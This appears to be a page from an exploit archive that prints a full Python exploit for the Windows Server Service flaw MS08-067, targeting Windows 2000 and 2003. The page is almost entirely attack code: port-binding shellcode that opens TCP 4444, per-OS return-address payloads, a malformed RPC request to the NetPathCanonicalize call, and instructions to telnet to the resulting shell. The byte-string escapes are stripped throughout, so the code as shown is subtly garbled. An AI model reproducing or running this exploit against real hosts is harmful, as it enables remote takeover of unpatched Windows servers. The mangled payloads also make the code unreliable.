[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3)
# Published : 2008-11-16
# Author : Debasis Mohanty
# Previous Title : Chilkat Socket activex 2.3.1.1 Remote Arbitrary File Creation Exploit
# Next Title : SmbRelay3 NTLM Replay Attack Tool/Exploit (MS08-068)
#!/usr/bin/env python
#############################################################################
# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
# www.hackingspirits.com
# www.coffeeandsecurity.com
# Email: d3basis.m0hanty @ gmail.com
#############################################################################
import struct
import sys
from threading import Thread #Thread is imported incase you would like to modify
#the src to run against multiple targets.
try:
from impacket import smb
from impacket import uuid
from impacket.dcerpc import dcerpc
from impacket.dcerpc import transport
except ImportError, _:
print 'Install the following library to make this script work'
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
sys.exit(1)
print '#######################################################################'
print '# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)'
print '# www.hackingspirits.com'
print '# www.coffeeandsecurity.com'
print '# Email: d3basis.m0hanty @ gmail.com'
print '#######################################################################n'
#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
shellcode += "x29xc9x83xe9xb0xe8xffxffxffxffxc0x5ex81x76x0exe9"
shellcode += "x4axb6xa9x83xeexfcxe2xf4x15x20x5dxe4x01xb3x49x56"
shellcode += "x16x2ax3dxc5xcdx6ex3dxecxd5xc1xcaxacx91x4bx59x22"
shellcode += "xa6x52x3dxf6xc9x4bx5dxe0x62x7ex3dxa8x07x7bx76x30"
shellcode += "x45xcex76xddxeex8bx7cxa4xe8x88x5dx5dxd2x1ex92x81"
shellcode += "x9cxafx3dxf6xcdx4bx5dxcfx62x46xfdx22xb6x56xb7x42"
shellcode += "xeax66x3dx20x85x6exaaxc8x2ax7bx6dxcdx62x09x86x22"
shellcode += "xa9x46x3dxd9xf5xe7x3dxe9xe1x14xdex27xa7x44x5axf9"
shellcode += "x16x9cxd0xfax8fx22x85x9bx81x3dxc5x9bxb6x1ex49x79"
shellcode += "x81x81x5bx55xd2x1ax49x7fxb6xc3x53xcfx68xa7xbexab"
shellcode += "xbcx20xb4x56x39x22x6fxa0x1cxe7xe1x56x3fx19xe5xfa"
shellcode += "xbax19xf5xfaxaax19x49x79x8fx22xa7xf5x8fx19x3fx48"
shellcode += "x7cx22x12xb3x99x8dxe1x56x3fx20xa6xf8xbcxb5x66xc1"
shellcode += "x4dxe7x98x40xbexb5x60xfaxbcxb5x66xc1x0cx03x30xe0"
shellcode += "xbexb5x60xf9xbdx1exe3x56x39xd9xdex4ex90x8cxcfxfe"
shellcode += "x16x9cxe3x56x39x2cxdcxcdx8fx22xd5xc4x60xafxdcxf9"
shellcode += "xb0x63x7ax20x0ex20xf2x20x0bx7bx76x5ax43xb4xf4x84"
shellcode += "x17x08x9ax3ax64x30x8ex02x42xe1xdexdbx17xf9xa0x56"
shellcode += "x9cx0ex49x7fxb2x1dxe4xf8xb8x1bxdcxa8xb8x1bxe3xf8"
shellcode += "x16x9axdex04x30x4fx78xfax16x9cxdcx56x16x7dx49x79"
shellcode += "x62x1dx4ax2ax2dx2ex49x7fxbbxb5x66xc1x19xc0xb2xf6"
shellcode += "xbaxb5x60x56x39x4axb6xa9"
#Payload for Windows 2000 target
payload_1='x41x00x5cx00x2ex00x2ex00x5cx00x2ex00x2ex00x5cx00'
payload_1+='x41x41x41x41x41x41x41x41'
payload_1+='x41x41x41x41x41x41x41x41'
payload_1+='x41x41'
payload_1+='x2fx68x18x00x8bxc4x66x05x94x04x8bx00xffxe0'
payload_1+='x43x43x43x43x43x43x43x43'
payload_1+='x43x43x43x43x43x43x43x43'
payload_1+='x43x43x43x43x43x43x43x43'
payload_1+='x43x43x43x43x43x43x43x43'
payload_1+='x43x43x43x43x43x43x43x43'
payload_1+='xebxcc'
payload_1+='x00x00'
#Payload for Windows 2003[SP2] target
payload_2='x41x00x5cx00'
payload_2+='x2ex00x2ex00x5cx00x2ex00'
payload_2+='x2ex00x5cx00x0ax32xbbx77'
payload_2+='x8bxc4x66x05x60x04x8bx00'
payload_2+='x50xffxd6xffxe0x42x84xae'
payload_2+='xbbx77xffxffxffxffx01x00'
payload_2+='x01x00x01x00x01x00x43x43'
payload_2+='x43x43x37x48xbbx77xf5xff'
payload_2+='xffxffxd1x29xbcx77xf4x75'
payload_2+='xbdx77x44x44x44x44x9exf5'
payload_2+='xbbx77x54x13xbfx77x37xc6'
payload_2+='xbax77xf9x75xbdx77x00x00'
if sys.argv[2]=='1': #Windows 2000 Payload
payload=payload_1
print '[-]Windows 2000 payload loaded'
if sys.argv[2]=='2': #Windows 2003[SP2] Payload
payload=payload_2
print '[-]Windows 2003[SP2] payload loaded'
class SRVSVC_Exploit(Thread):
def __init__(self, target, osver, port=445):
super(SRVSVC_Exploit, self).__init__()
self.__port = port
self.target = target
self.osver = osver
def __DCEPacket(self):
print '[-]Initiating connection'
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\pipe\browser]' % self.target)
self.__trans.connect()
print '[-]connected to ncacn_np:%s[\pipe\browser]' % self.target
self.__dce = self.__trans.DCERPC_class(self.__trans)
self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
# Constructing Malicious Packet
self.__stub='x01x00x00x00'
self.__stub+='xd6x00x00x00x00x00x00x00xd6x00x00x00'
self.__stub+=shellcode
self.__stub+='x41x41x41x41x41x41x41x41'
self.__stub+='x41x41x41x41x41x41x41x41'
self.__stub+='x41x41x41x41x41x41x41x41'
self.__stub+='x41x41x41x41x41x41x41x41'
self.__stub+='x41x41x41x41x41x41x41x41'
self.__stub+='x41x41x41x41x41x41x41x41'
self.__stub+='x41x41x41x41x41x41x41x41'
self.__stub+='x41x41x41x41x41x41x41x41'
self.__stub+='x00x00x00x00'
self.__stub+='x2fx00x00x00x00x00x00x00x2fx00x00x00'
self.__stub+=payload
self.__stub+='x00x00x00x00'
self.__stub+='x02x00x00x00x02x00x00x00'
self.__stub+='x00x00x00x00x02x00x00x00'
self.__stub+='x5cx00x00x00x01x00x00x00'
self.__stub+='x01x00x00x00'
return
def run(self):
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub) #0x1f (or 31)- NetPathCanonicalize Operation
print '[-]Exploit sent to target successfully...n[1]Telnet to port 4444 on target machine...'
if __name__ == '__main__':
try:
target = sys.argv[1]
osver = sys.argv[2]
except IndexError:
print 'nUsage: %s <target ip> <os version>n' % sys.argv[0]
print 'Example: srvsvcexpl.py 192.168.1.1 2n'
print 'Select OS Version'
print '[-]Windows 2000: OS Version = 1'
print '[-]Windows 2003[SP2]: OS Version = 2'
sys.exit(-1)
current = SRVSVC_Exploit(target, osver)
current.start()
#print '[-]Exploit sent to target successfully...n[-]Telnet to port 4444 on target machine...'
# www.Syue.com [2008-11-16]